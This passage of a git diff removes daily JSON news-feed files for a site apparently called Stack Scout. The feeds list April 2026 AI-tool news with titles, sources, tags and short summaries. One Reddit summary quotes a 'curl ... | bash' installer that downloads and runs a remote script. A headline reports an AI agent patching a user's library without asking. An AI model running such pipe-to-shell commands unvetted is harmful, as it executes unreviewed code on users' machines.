"2026-04-19T09:53:47.000Z", - "summary": "Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry.\n\nSo I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r", - "category": "ai_tools" - }, - { - "title": "Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents", - "url": "https://x.com/BonairoFi/status/2045823726919258175", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-19T14:55:13.955Z", - "summary": "Braygent's take on Elon endorsing OpenClaw for X API access. The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale.", - "category": "ai_tools" - }, - { - "title": "Vercel Got Breached — Roll Your Secrets Right Now", - "url": "https://x.com/vercel/status/2045865072074035664", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-19T14:55:13.955Z", - "summary": "Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel.", - "category": "ai_tools" - }, - { - "title": "Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day", - "url": "https://x.com/AmpereSh/status/2045866315496161601", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-19T14:55:13.955Z", - "summary": "Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week.", - "category": "ai_tools" - }, - { - "title": "Scoble Reshares Elon Musk's OpenClaw X API Endorsement", - "url": "https://x.com/Scobleizer/status/2045572824866398399", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-19T14:55:12.737Z", - "summary": "Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community.", - "category": "ai_tools" - }, - { - "title": "Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-19T14:24:42.000Z", - "summary": "Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive.\n\nIf the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a ", - "category": "ai_research" - }, - { - "title": "RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-19T14:01:39.000Z", - "summary": "TL;DR: \n\nIf you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment?\n\nI’m currently at a crossroads and need some community wisdom. I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB.\n\nMy job is just needing to fine-tune with sma", - "category": "ai_models" - }, - { - "title": "Acceptable prompt processing speed for you?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-19T08:00:39.000Z", - "summary": "I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. \n\nFor agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good?", - "category": "ai_models" - }, - { - "title": "Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion", - "url": "https://www.latent.space/p/notion", - "source": "Latent Space", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 0.98, - "date": "2026-04-19T18:00:16.628Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Prepay for the Gemini API to get more control over your spend", - "url": "https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/", - "source": "Google AI Blog", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.94, - "date": "2026-04-19T18:00:09.702Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes", - "url": "https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash", - "source": "Rohan Paul", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.9, - "date": "2026-04-19T18:00:24.143Z", - "summary": null, - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-20.json b/data/news-feed-2026-04-20.json deleted file mode 100644 index 98273be..0000000 --- a/data/news-feed-2026-04-20.json +++ /dev/null @@ -1,251 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.244Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-20", - "article_count": 15, - "archived_story_count": 503, - "articles": [ - { - "title": "PowerShell v7.6.0 released", - "url": "https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0", - "source": "GitHub Releases · PowerShell", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-18T18:49:57.000Z", - "summary": "## [7.6.0] - 2026-03-12\r\n\r\n### General Cmdlet Updates and Fixes\r\n\r\n- Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973)\r\n\r\n### Tests\r\n\r\n- Add GitHub Actions annotations for Pester test failures (#26969)\r\n- Fix `Import-Module.Tests.ps1` to handle Arm32 platform (#26888)\r\n\r\n### Build and Packaging Improvements\r\n\r\n
              \r\n\r\n\r\n\r\n

              Update to .NET SDK 10.0.201

              \r\n\r\n
              \r\n\r\n
                \r\n
              • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041)\r\n\r\n\r\n\r\n

                Update to .NET SDK 10.0.202

                \r\n\r\n
                \r\n\r\n
                  \r\n
                • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
                • \r\n
                • Update branch for release (#27287)
                • \r\n
                • Fix package pipeline by adding in PDP-Media direct", - "category": "ai_tools" - }, - { - "title": "Perplexity Computer Just Launched — OpenClaw for the Rest of Us", - "url": "https://x.com/davidlee/status/2046589300188598440", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-21T14:56:45.085Z", - "summary": "Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption.", - "category": "ai_tools" - }, - { - "title": "Open source Image Generation CLI. One binary.", - "url": "https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-21T00:37:35.000Z", - "summary": "I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs.\n\nIt uses diffusers underneath. The CLI is Rust, the GPU worker is Python. One binary, no Docker required.\n\nWhat it looks like:\n\n\\# Install\n\ncurl -fsSL https://modl.run/install | bash\n\n\\# Pu", - "category": "creative_tools" - }, - { - "title": "@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker", - "url": "https://x.com/LumaLabsAI/status/2046356064187363368", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-20T23:53:38.094Z", - "summary": "Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills.", - "category": "ai_tools" - }, - { - "title": "I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent", - "url": "https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-21T17:52:07.000Z", - "summary": "I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused.\n\nThat made sense at the start. Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow.\n\nBut after building a few integrations, I kept running into the same uncomfortable question:\n\nIf I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C", - "category": "ai_tools" - }, - { - "title": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", - "url": "https://x.com/Ali_TongyiLab/status/2044771299483107739", - "source": "X / @ali_tongyilab", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-16T13:34:02.000Z", - "summary": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", - "category": "ai_tools" - }, - { - "title": "Open source CRT animation lora for ltx 2.3", - "url": "https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-20T16:22:01.000Z", - "summary": "None of the video gen models do a real CRT terminal animation look.\n\nWeights + recipe:\n\n🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora)", - "category": "creative_tools" - }, - { - "title": "LinkedIn Launched Blind AI Model Comparison — Finally a Practical Evaluation Tool", - "url": "https://x.com/DataconomyMedia/status/2046589880226996228", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-21T14:56:45.085Z", - "summary": "Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers.", - "category": "ai_tools" - }, - { - "title": "Scoble: I Took My AI to Stanford — It Has My Personality Now", - "url": "https://x.com/Scobleizer/status/2046495684493562130", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-21T14:55:24.550Z", - "summary": "Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality.", - "category": "ai_tools" - }, - { - "title": "I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com", - "url": "https://x.com/Scobleizer/status/2046194231321190735", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-20T23:50:37.016Z", - "summary": "Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon.", - "category": "ai_tools" - }, - { - "title": "[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)", - "url": "https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds", - "source": "Latent Space", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.9, - "date": "2026-04-21T06:00:30.085Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Framework Laptop 13 Pro", - "url": "https://frame.work/laptop13pro", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.8899999999999999, - "date": "2026-04-21T18:00:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?", - "url": "https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.87, - "date": "2026-04-21T14:30:07.000Z", - "summary": "Hi everyone,\n\nI really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup.\n\nRight now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance?\n\nI just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations ", - "category": "creative_tools" - }, - { - "title": "ComfyUI + CUDA + Docker in a single command", - "url": "https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.8600000000000001, - "date": "2026-04-21T14:06:06.000Z", - "summary": "What's up everyone! So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything.\n\nThe goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA:\n\n* Uses NVIDIA Container Toolkit for GPU passthrough\n* Persistent storage via a Docker volume\n* No modifications to ComfyUI itself\n* G", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-22.json b/data/news-feed-2026-04-22.json deleted file mode 100644 index 5addd58..0000000 --- a/data/news-feed-2026-04-22.json +++ /dev/null @@ -1,247 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.627Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-22", - "article_count": 15, - "archived_story_count": 587, - "articles": [ - { - "title": "Qwen Code v0.15.0 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-22T11:45:35.000Z", - "summary": "## What's Changed\n* feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248\n* feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100\n* feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827\n* fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g", - "category": "ai_tools" - }, - { - "title": "gpt-5.4 Is Patching Your Code Without Asking", - "url": "https://x.com/N8Programs/status/2046725816126460254", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-21T23:53:16.523Z", - "summary": "Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries.", - "category": "ai_tools" - }, - { - "title": "I've been using Claude Cowork since launch. Here's what actually works for non-technical tasks (no code).", - "url": "https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-22T19:58:13.000Z", - "summary": "I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. \nNo terminal. No code. Just the stuff that actually works for normal knowledge work.\n\nWhat Cowork actually is\n\nMost AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. The big difference from regular Claude chat is it can handle multi-", - "category": "ai_tools" - }, - { - "title": "Vercel CLI @vercel/oidc@3.2.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.76, - "date": "2026-04-22T00:29:41.000Z", - "summary": "### Patch Changes\n\n- Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w", - "category": "ai_tools" - }, - { - "title": "Remotion v4.0.451 released", - "url": "https://github.com/remotion-dev/remotion/releases/tag/v4.0.451", - "source": "GitHub Releases · Remotion", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-22T06:46:26.000Z", - "summary": "## What's Changed\n\nFixes version mismatches appearing when running the CLI.\n\n**Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451\n", - "category": "ai_tools" - }, - { - "title": "How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20", - "url": "https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas", - "source": "Hugging Face Blog", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-22T18:00:15.535Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "GPT-5.5 Spud Is Rumored for Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7", - "url": "https://x.com/bridgemindai/status/2046919920953282921", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T14:46:06.595Z", - "summary": "GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships.", - "category": "ai_tools" - }, - { - "title": "Opensource autoregressive models", - "url": "https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-22T08:37:26.000Z", - "summary": "I am interested why there no autoregressive models like gpt-image or nano-banana in open source. \nOk, i am know about hunyan, but its not competetive with google and openai. \n\nIn LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models.\n\nWhy qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this.\n\n", - "category": "creative_tools" - }, - { - "title": "Hermes Just Became a Different Kind of Agent", - "url": "https://x.com/NousResearch/status/2046721845261652066", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-21T23:53:16.523Z", - "summary": "Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem.", - "category": "ai_tools" - }, - { - "title": "Cursor Is Built on Open Source and Worth $60 Billion", - "url": "https://x.com/BLUECOW009/status/2046725740134052232", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-21T23:53:16.523Z", - "summary": "Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era.", - "category": "ai_tools" - }, - { - "title": "Crush v0.62.0 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.0", - "source": "GitHub Releases · Crush", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.94, - "date": "2026-04-22T21:08:45.000Z", - "summary": "# 98% reduction in token usage\r\n\r\nYou read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default.\r\n\r\n## Small system prompt\r\n\r\nThis was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default.\r\n\r\nCrush used to have long descriptions for tools with instruction on how to use them. Turns out that models got a lot better with time, and now the", - "category": "ai_tools" - }, - { - "title": "GitHub CLI now collects pseudoanonymous telemetry", - "url": "https://cli.github.com/telemetry", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.91, - "date": "2026-04-22T11:58:58.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "[AINews] OpenAI launches GPT-Image-2", - "url": "https://www.latent.space/p/ainews-openai-launches-gpt-image", - "source": "Latent Space", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-04-22T06:00:41.638Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Google unveils two new TPUs designed for the “agentic era”", - "url": "https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/", - "source": "Ars Technica AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.8200000000000001, - "date": "2026-04-22T18:00:20.329Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Prisma 7.8.0 released", - "url": "https://github.com/prisma/prisma/releases/tag/7.8.0", - "source": "GitHub Releases · Prisma", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.78, - "date": "2026-04-22T14:19:23.000Z", - "summary": "Today, we are excited to share the `7.8.0` stable release 🎉\r\n\r\n**🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!**\r\n\r\n# Highlights\r\n\r\n## ORM\r\n\r\n### Features\r\n\r\n**Prisma Client**\r\n\r\n- Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. A larger value can improve performance", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-23.json b/data/news-feed-2026-04-23.json deleted file mode 100644 index 77fa8be..0000000 --- a/data/news-feed-2026-04-23.json +++ /dev/null @@ -1,207 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.807Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-23", - "article_count": 13, - "archived_story_count": 167, - "articles": [ - { - "title": "Gemini CLI v0.39.0 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-23T04:12:56.000Z", - "summary": "## What's Changed\n* refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849\n* feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876\n* feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544\n* chore(release): bump version to 0.39.0-nightly.202604", - "category": "ai_tools" - }, - { - "title": "Google Cloud launches two new AI chips to compete with Nvidia", - "url": "https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-23T06:07:24.599Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "OpenAI Just Made ChatGPT a Team Sport", - "url": "https://x.com/eddiboi/status/2047009433255854119", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure.", - "category": "ai_tools" - }, - { - "title": "Anthropic Just Sent a Fleet of Bug Hunters Into Your Code", - "url": "https://x.com/AIRoboticsInt/status/2047012029169324532", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale.", - "category": "ai_tools" - }, - { - "title": "Character.AI Finally Remembers You", - "url": "https://x.com/character_ai/status/2047030699417571565", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational.", - "category": "ai_tools" - }, - { - "title": "Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now", - "url": "https://x.com/replicate/status/2047027042781106649", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving.", - "category": "ai_tools" - }, - { - "title": "One OAuth Token Brought Down Vercel, GitHub, and npm", - "url": "https://x.com/Obots_ai/status/2046952458207838375", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today.", - "category": "ai_tools" - }, - { - "title": "Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3", - "url": "https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration", - "source": "Hugging Face Blog", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-23T06:07:22.934Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "OpenAI's response to the Axios developer tool compromise", - "url": "https://openai.com/index/axios-developer-tool-compromise/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.82, - "date": "2026-04-23T00:45:01.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Amuse V3.3.3 Pre-release Available.", - "url": "https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.78, - "date": "2026-04-23T01:10:52.000Z", - "summary": "Amuse V3.3.3 Pre-release is now available. 4.0 release coming in July.\n\n[https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3)\n\nV3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also.\n\nEssentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything ", - "category": "creative_tools" - }, - { - "title": "Goose v1.32.0 released", - "url": "https://github.com/aaif-goose/goose/releases/tag/v1.32.0", - "source": "GitHub Releases · Goose", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.76, - "date": "2026-04-23T07:45:24.000Z", - "summary": "## ✨ Features\n\n- Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487)\n- Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647)\n- @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571)\n- `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600)\n- Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745)\n- Auto-compaction for goose2 context window ", - "category": "ai_tools" - }, - { - "title": "Qwen Code v0.15.1 released", - "url": 